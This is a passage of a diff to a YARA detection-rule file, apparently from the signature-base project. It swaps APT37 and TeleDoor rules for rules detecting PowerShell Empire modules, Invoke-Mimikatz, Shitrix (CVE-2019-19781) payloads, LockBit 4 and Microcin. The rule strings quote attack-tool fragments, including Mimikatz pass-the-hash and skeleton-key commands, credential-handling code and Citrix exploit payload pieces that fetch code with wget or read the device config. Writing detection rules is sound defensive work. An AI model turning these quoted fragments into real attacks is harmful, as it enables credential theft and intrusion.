+		$s1 = "$PEBytes64 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwc" ascii
+		$s2 = "[System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)" fullword ascii
+		$s3 = "Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 6000KB and ( ( 1 of ( $x* ) and 2 of them ) or 3 of them ) or all of them
+		filesize < 2500KB and 2 of them
 }
-rule SIGNATURE_BASE_Teledoor_Backdoor : FILE
+rule SIGNATURE_BASE_Empire_Lib_Modules_Credentials_Mimikatz_Pth : FILE
 {
 	meta:
-		description = "Detects the TeleDoor Backdoor as used in Petya Attack in June 2017"
+		description = "Empire - a pure PowerShell post-exploitation agent - file pth.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ba9b4415-427e-5a13-b743-bed225d86db8"
-		date = "2017-07-05"
+		id = "f954b7e8-e820-5111-ba8d-a9b9779381b0"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/CpfJQQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_teledoor.yar#L11-L31"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L118-L133"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "785360fa19a61a547309fc7a8968c94d4887be001c6a66b41c7adb9dcd13cb82"
-		score = 75
+		hash = "6dee1cf931e02c5f3dc6889e879cc193325b39e18409dcdaf987b8bf7c459211"
+		logic_hash = "6989c2e50ce642e0300e1293f46cd36e5141274d1e7172a8312595bb515bede2"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d462966166450416d6addd3bfdf48590f8440dd80fc571a389023b7c860ca3ac"
-		hash2 = "f9d6fe8bd8aca6528dec7eaa9f1aafbecde15fd61668182f2ba8a7fc2b9a6740"
-		hash3 = "2fd2863d711a1f18eeee5c7c82f2349c5d4e00465de9789da837fcdca4d00277"
 
 	strings:
-		$c1 = { 50 61 79 6C 6F 61 64 00 41 75 74 6F 50 61 79 6C 6F 61 64 }
-		$c2 = { 52 75 6E 43 6D 64 00 44 75 6D 70 44 61 74 61 }
-		$c3 = { 00 5A 76 69 74 57 65 62 43 6C 69 65 6E 74 45 78 74 00 4D 69 6E 49 6E 66 6F }
+		$s0 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii
+		$s1 = "command = \"sekurlsa::pth /user:\"+self.options[\"user\"]['Value']" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 2 of them )
+		filesize < 12KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_Keyword_Injectdll : FILE
+rule SIGNATURE_BASE_Empire_Write_Hijackdll : FILE
 {
 	meta:
-		description = "Detects suspicious InjectDLL keyword found in hacktools or possibly unwanted applications"
+		description = "Empire - a pure PowerShell post-exploitation agent - file Write-HijackDll.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "422eed76-7dfa-5490-a866-d337434eaddc"
-		date = "2019-04-04"
+		id = "6a80af21-fb01-5996-b14d-44ff55b7fb3e"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://github.com/zerosum0x0/koadic"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_hacktool.yar#L2-L16"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L135-L151"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "51c54026672e9ad36d2d68ae8dba61437f8808fbf2ad3c3c7bb086d8abb63987"
-		score = 60
+		hash = "155fa7168e28f15bb34f67344f47234a866e2c63b3303422ff977540623c70bf"
+		logic_hash = "e01157fe4adaf647474292bfbbb8196c0b7e89433da52a386a8d9573ae543679"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "2e7b4141e1872857904a0ef2d87535fd913cbdd9f964421f521b5a228a492a29"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "InjectDLL" fullword ascii
-		$s4 = "Kernel32.dll" fullword ascii
+		$s1 = "$DllBytes = Invoke-PatchDll -DllBytes $DllBytes -FindString \"debug.bat\" -ReplaceString $BatchPath" fullword ascii
+		$s2 = "$DllBytes32 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBw" ascii
+		$s3 = "[Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes32)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		filesize < 500KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_Python_Sectools
+rule SIGNATURE_BASE_Empire_Skeleton_Key : FILE
 {
 	meta:
-		description = "Detects code which uses the python lib sectools"
-		author = "Arnim Rupp"
-		id = "89a5e0ba-5547-53e4-84a3-d07ee779596e"
-		date = "2023-01-27"
+		description = "Empire - a pure PowerShell post-exploitation agent - file skeleton_key.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d508e09e-13e8-5866-bb5b-0d886f960bb5"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://github.com/p0dalirius/sectools"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_hacktool.yar#L18-L35"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L153-L170"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "814ba1aa62bbb7aba886edae0f4ac5370818de15ca22a52a6ab667b4e93abf84"
-		hash = "b3328ac397d311e6eb79f0a5b9da155c4d1987e0d67487ea681ea59d93641d9e"
-		hash = "8cd205d5380278cff6673520439057e78fb8bf3d2b1c3c9be8463e949e5be4a1"
-		logic_hash = "17f6897dc623f822c7ae6a7ae51714e78316d7b7fdf59b9f2f625ecaae939522"
-		score = 50
+		hash = "3d02f16dcc38faaf5e97e4c5dbddf761f2816004775e6af8826cde9e29bb750f"
+		logic_hash = "910451b2b2ed7cb5f7891d97d15e49da24b182adc903926f539fc4bfe589f2d5"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$import1 = "from sectools"
-		$import2 = "import sectools"
+		$s1 = "script += \"Invoke-Mimikatz -Command '\\\"\" + command + \"\\\"';\"" fullword ascii
+		$s2 = "script += '\"Skeleton key implanted. Use password \\'mimikatz\\' for access.\"'" fullword ascii
+		$s3 = "command = \"misc::skeleton\"" fullword ascii
+		$s4 = "\"ONLY APPLICABLE ON DOMAIN CONTROLLERS!\")," fullword ascii
 
 	condition:
-		any of ( $import* )
+		filesize < 6KB and 2 of them
 }
-rule SIGNATURE_BASE_Hvs_APT37_Smb_Scanner : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Wmi : FILE
 {
 	meta:
-		description = "Unknown smb login scanner used by APT37"
-		author = "Marc Stroebel"
-		id = "89a5cc32-f151-583d-823d-692de2c2b084"
-		date = "2020-12-15"
+		description = "Empire - a pure PowerShell post-exploitation agent - file invoke_wmi.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1e1d1e71-6ea9-500a-b8b8-c48a64bc2b54"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://www.hybrid-analysis.com/sample/d16163526242508d6961f061aaffe3ae5321bd64d8ceb6b2788f1570757595fc?environmentId=2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec20.yar#L2-L29"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L172-L188"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0bea71db7052f1c22c01cfbf710d4ed24651cbbd8b0fd29f09dfd49c4e314028"
-		score = 75
+		hash = "a914cb227f652734a91d3d39745ceeacaef7a8b5e89c1beedfd6d5f9b4615a1d"
+		logic_hash = "7179a22eec8eb9e59bf590e671e6849d5b960c58eb8fa591bc3b340d64f1d076"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Scan.exe StartIP EndIP ThreadCount logfilePath [Username Password Deep]" fullword ascii
-		$s2 = "%s - %s:(Username - %s / Password - %s" fullword ascii
-		$s3 = "Load mpr.dll Error " fullword ascii
-		$s4 = "Load Netapi32.dll Error " fullword ascii
-		$s5 = "%s U/P not Correct! - %d" fullword ascii
-		$s6 = "GetNetWorkInfo Version 1.0" fullword wide
-		$s7 = "Hello World!" fullword wide
-		$s8 = "%s Error: %ld" fullword ascii
-		$s9 = "%s U/P Correct!" fullword ascii
-		$s10 = "%s --------" fullword ascii
-		$s11 = "%s%-30s%I64d" fullword ascii
-		$s12 = "%s%-30s(DIR)" fullword ascii
-		$s13 = "%04d-%02d-%02d %02d:%02d" fullword ascii
-		$s14 = "Share:              Local Path:                   Uses:   Descriptor:" fullword ascii
-		$s15 = "Share:              Type:                   Remark:" fullword ascii
+		$s1 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii
+		$s2 = "script += \";'Invoke-Wmi executed on \" +computerNames +\"'\"" fullword ascii
+		$s3 = "script = \"$PSPassword = \\\"\"+password+\"\\\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Man" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 10 of them )
+		filesize < 20KB and 2 of them
 }
-rule SIGNATURE_BASE_Hvs_APT37_Cred_Tool : FILE
+rule SIGNATURE_BASE_Invoke_Mimikatz
 {
 	meta:
-		description = "Unknown cred tool used by APT37"
-		author = "Markus Poelloth"
-		id = "e830025a-f2ac-55b1-aca3-ded9dba83a67"
-		date = "2020-12-15"
+		description = "Detects Invoke-Mimikatz String"
+		author = "Florian Roth (Nextron Systems)"
+		id = "37de51a6-e1bb-5ee7-9b7f-8fe17b3697b5"
+		date = "2016-08-03"
 		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec20.yar#L31-L50"
+		reference = "https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_invoke_mimikatz.yar#L10-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4fb7247b88f2d252e7c9d5034c209945bc9e17f49de3dcdb5bf50b5afb302987"
+		logic_hash = "b9bfa54a64d6f6b8af97ec62c9102ccf0912a19b65fbd25a4836480e63497a00"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67"
 
 	strings:
-		$s1 = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>" fullword ascii
-		$s2 = "Domain Login" fullword ascii
-		$s3 = "IEShims_GetOriginatingThreadContext" fullword ascii
-		$s4 = " Type Descriptor'" fullword ascii
-		$s5 = "User: %s" fullword ascii
-		$s6 = "Pass: %s" fullword ascii
-		$s7 = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
-		$s8 = "E@c:\\u" fullword ascii
+		$x2 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm" ascii
+		$x3 = "Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp" fullword ascii
 
 	condition:
-		filesize < 500KB and 7 of them
+		1 of them
 }
-
-rule SIGNATURE_BASE_Hvs_APT37_RAT_Loader
+rule SIGNATURE_BASE_EXPL_Shitrix_Exploit_Code_Jan20_1 : FILE CVE_2019_19781
 {
 	meta:
-		description = "BLINDINGCAN RAT loader named iconcash.db used by APT37"
-		author = "Marc Stroebel"
-		id = "6c3e8465-d607-59bf-85fc-5abbef71fb1c"
-		date = "2020-12-15"
+		description = "Detects payloads used in Shitrix exploitation CVE-2019-19781"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7fab3a9b-82a5-573a-b210-2ae65f1a7f24"
+		date = "2020-01-13"
 		modified = "2023-12-05"
-		reference = "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec20.yar#L52-L65"
+		reference = "https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+Overview+of+Observed+Payloads/25704/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_shitrix.yar#L2-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9"
-		logic_hash = "241f2683adc29e8aca30ae24278f3703fef0fed6b276dae488fdb32c167af1c9"
-		score = 75
+		logic_hash = "00687b30235be5ef3c00432b5b96bbc325dee553e7c0cb565d6f389b1bce12de"
+		score = 70
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE, CVE-2019-19781"
+
+	strings:
+		$s01 = "/netscaler/portal/scripts/rmpm.pl" ascii
+		$s02 = "tee /netscaler/portal/templates/" ascii
+		$s03 = "exec(\\'(wget -q -O- http://" ascii
+		$s04 = "cd /netscaler/portal; ls" ascii
+		$s05 = "cat /flash/nsconfig/ns.conf" ascii
+		$s06 = "/netscaler/portal/scripts/PersonalBookmak.pl" ascii
+		$s07 = "template.new({'BLOCK'='print readpipe(" ascii
+		$s08 = "pwnpzi1337" fullword ascii
+		$s09 = "template.new({'BLOCK'="
+		$s10 = "template.new({'BLOCK'%3d"
+		$s11 = "my ($citrixmd, %FORM);"
+		$s12 = "(CMD, \"($citrixmd) 2>&1"
+		$b1 = "NSC_USER:" ascii nocase
+		$b2 = "NSC_NONCE:" ascii nocase
+		$b3 = "/../" ascii
 
 	condition:
-		(pe.version_info [ "OriginalFilename" ] contains "MFC_DLL.dll" ) and ( pe.exports ( "SMain" ) and pe.exports ( "SMainW" ) )
+		1 of ( $s* ) or all of ( $b* )
 }
-rule SIGNATURE_BASE_Hvs_APT37_Webshell_Img_Thumbs_Asp : FILE
+rule SIGNATURE_BASE_Mal_Lockbit4_Hashing_Alg_Win_Feb24 : FILE
 {
 	meta:
-		description = "Webshell named img.asp, thumbs.asp or thumb.asp used by APT37"
-		author = "Moritz Oettle"
-		id = "e45d4507-81de-5f72-9ce2-4f0e3e5c62b1"
-		date = "2020-12-15"
-		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec20.yar#L68-L95"
+		description = "This rule detects the custom hashing algorithm of Lockbit4.0 unpacked"
+		author = "0x0d4y"
+		id = "e91aedba-6f70-4ca2-9217-2991cbbc6e8d"
+		date = "2024-02-16"
+		modified = "2025-03-20"
+		reference = "https://0x0d4y.blog/lockbit4-0-evasion-tales/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lockbit4_hashing_alg_win_feb24.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "94d2448d3794ae3f29678a7337473d259b5cfd1c7f703fe53ee6c84dd10a48ef"
-		logic_hash = "58ccee11c08330c8cd4148e623a2e59e024d6d5f3067331dbdd962d0f6a8daa4"
-		score = 75
+		hash = "062311f136d83f64497fd81297360cd4"
+		logic_hash = "41497ea30a4cfdd111726a5819ec404a1eeba1693f5d6b89ac38558eb1c6bde9"
+		score = 100
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		license = "CC BY 4.0"
+		rule_matching_tlp = "TLP:WHITE"
+		rule_sharing_tlp = "TLP:WHITE"
+		malpedia_family = "win.lockbit"
 
 	strings:
-		$s1 = "strMsg = \"E : F\"" fullword ascii
-		$s2 = "strMsg = \"S : \" & Len(fileData)" fullword ascii
-		$s3 = "Left(workDir, InStrRev(workDir, \"/\")) & \"video\""
-		$a1 = "Server.CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
-		$a2 = "Dim tmpPath, workDir" fullword ascii
-		$a3 = "Dim objFSO, objTextStream" fullword ascii
-		$a4 = "workDir = Request.ServerVariables(\"URL\")" fullword ascii
-		$a5 = "InStrRev(workDir, \"/\")" ascii
-		$g1 = "WriteFile = 0" fullword ascii
-		$g2 = "fileData = Request.Form(\"fp\")" fullword ascii
-		$g3 = "fileName = Request.Form(\"fr\")" fullword ascii
-		$g4 = "Err.Clear()" fullword ascii
-		$g5 = "Option Explicit" fullword ascii
+		$hashing_alg = { 41 89 d0 46 0f be 04 00 45 09 c0 74 ?? 45 8d 48 ?? 45 8d 50 ?? 41 80 f9 ?? 45 0f 43 d0 44 31 d1 44 8d 04 3a 45 0f af c2 41 01 c8 89 d1 31 f9 09 d2 0f 44 ca 41 0f af c8 44 01 d1 ff c2 eb ?? 49 ff c6 }
 
 	condition:
-		filesize < 2KB and ( ( 1 of ( $s* ) ) or ( 3 of ( $a* ) ) or ( 5 of ( $g* ) ) )
+		uint16( 0 ) == 0x5a4d and $hashing_alg
 }
-rule SIGNATURE_BASE_Hvs_APT37_Webshell_Template_Query_Asp : FILE
+
+rule SIGNATURE_BASE_Microcin_Sample_1 : FILE
 {
 	meta:
-		description = "Webshell named template-query.aspimg.asp used by APT37"
-		author = "Moritz Oettle"
-		id = "dc006b46-4c51-59cd-8b7d-adbfec86cd2e"
-		date = "2020-12-15"
+		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
+		author = "Florian Roth (Nextron Systems)"
+		id = "96e9ac3b-a837-5909-b17b-259d54e0e7fd"
+		date = "2017-09-26"
 		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec20.yar#L97-L120"
+		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_microcin.yar#L13-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "961a66d01c86fa5982e0538215b17fb9fae2991331dfea812b8c031e2ceb0d90"
-		logic_hash = "d8bd017e9103bddb0b8a86effa8a4b0617b54bd643bcc36b6f678a3e60f8559f"
+		logic_hash = "e7eb967035257490db2537ba46fd1f1e378fc33f93e7f65412949e987194a9db"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "49816eefcd341d7a9c1715e1f89143862d4775ba4f9730397a1e8529f5f5e200"
+		hash2 = "a73f8f76a30ad5ab03dd503cc63de3a150e6ab75440c1060d75addceb4270f46"
+		hash3 = "9dd9bb13c2698159eb78a0ecb4e8692fd96ca4ecb50eef194fa7479cb65efb7c"
 
 	strings:
-		$g1 = "server.scripttimeout=600" fullword ascii
-		$g2 = "response.buffer=true" fullword ascii
-		$g3 = "response.expires=-1" fullword ascii
-		$g4 = "session.timeout=600" fullword ascii
-		$a1 = "redhat hacker" ascii
-		$a2 = "want_pre.asp" ascii
-		$a3 = "vgo=\"admin\"" ascii
-		$a4 = "ywc=false" ascii
-		$s1 = "public  br,ygv,gbc,ydo,yka,wzd,sod,vmd" fullword ascii
+		$s1 = "e Class Descriptor at (" ascii
+		$s2 = ".?AVCAntiAntiAppleFrameRealClass@@" fullword ascii
+		$s3 = ".?AVCAntiAntiAppleFrameBaseClass@@" fullword ascii
+		$s4 = ".?AVCAppleBinRealClass@@" fullword ascii
+		$s5 = ".?AVCAppleBinBaseClass@@" fullword ascii
 
 	condition:
-		filesize > 70KB and filesize < 200KB and ( ( 1 of ( $s* ) ) or ( 2 of ( $a* ) ) or ( 3 of ( $g* ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 4 of them or pe.imphash ( ) == "897077ca318eaf629cfe74569f10e023" ) )
 }
-rule SIGNATURE_BASE_Hvs_APT37_Webshell_Controllers_Asp : FILE
+rule SIGNATURE_BASE_Microcin_Sample_2 : FILE
 {
 	meta:
-		description = "Webshell named controllers.asp or inc-basket-offer.asp used by APT37"
-		author = "Moritz Oettle"
-		id = "82370415-30f4-514d-8806-e2daced96f07"
-		date = "2020-12-15"
+		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8718ef84-be2b-55a6-a4bb-41161548a2b4"
+		date = "2017-09-26"
 		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec20.yar#L140-L218"
+		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_microcin.yar#L38-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "829462fc6d84aae04a962dfc919d0a392265fbf255eab399980d2b021e385517"
-		logic_hash = "a6e53e99f7500683d3b62a7630cecb53ee6c13b335cbf9912366675db964aefe"
+		logic_hash = "99feb3e1672f69c4cf41a100e9ba64421fd75c3554306a1bf1475da6f1e14ed1"
 		score = 75
-		quality = 28
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8a7d04229722539f2480270851184d75b26c375a77b468d8cbad6dbdb0c99271"
 
 	strings:
-		$s0 = "<%@Language=VBScript.Encode" ascii
-		$x1 = { 64 7F 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x2 = { 64 7F 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x3 = { 64 7F 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x4 = { 64 7F 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x5 = { 64 7F 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x6 = { 64 7F 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x7 = { 64 7F 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x8 = { 64 41 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x9 = { 64 41 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x10 = { 64 41 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x11 = { 64 41 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x12 = { 64 7F 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x13 = { 64 41 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x14 = { 64 41 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x15 = { 64 41 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x16 = { 64 41 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x17 = { 64 41 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x18 = { 64 41 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x19 = { 64 41 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x20 = { 64 41 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x21 = { 64 41 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x22 = { 64 41 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x23 = { 64 7F 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x24 = { 64 41 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x25 = { 64 41 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x26 = { 6A 7F 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x27 = { 6A 7F 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x28 = { 6A 7F 44 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x29 = { 6A 7F 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x30 = { 6A 7F 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x31 = { 6A 7F 44 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x32 = { 6A 7F 44 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x33 = { 6A 7F 44 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x34 = { 64 7F 44 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x35 = { 6A 7F 49 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x36 = { 6A 7F 49 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x37 = { 6A 7F 49 2D 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x38 = { 6A 7F 49 2D 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x39 = { 6A 7F 49 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x40 = { 6A 7F 49 23 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x41 = { 6A 7F 49 23 41 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x42 = { 6A 7F 49 23 41 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x43 = { 6A 41 44 2D 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x44 = { 6A 41 44 2D 7F 49 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
-		$x45 = { 64 7F 44 23 7F 44 63 2F 6D 4D 6B 61 4F 59 62 3A 6E 72 21 59 }
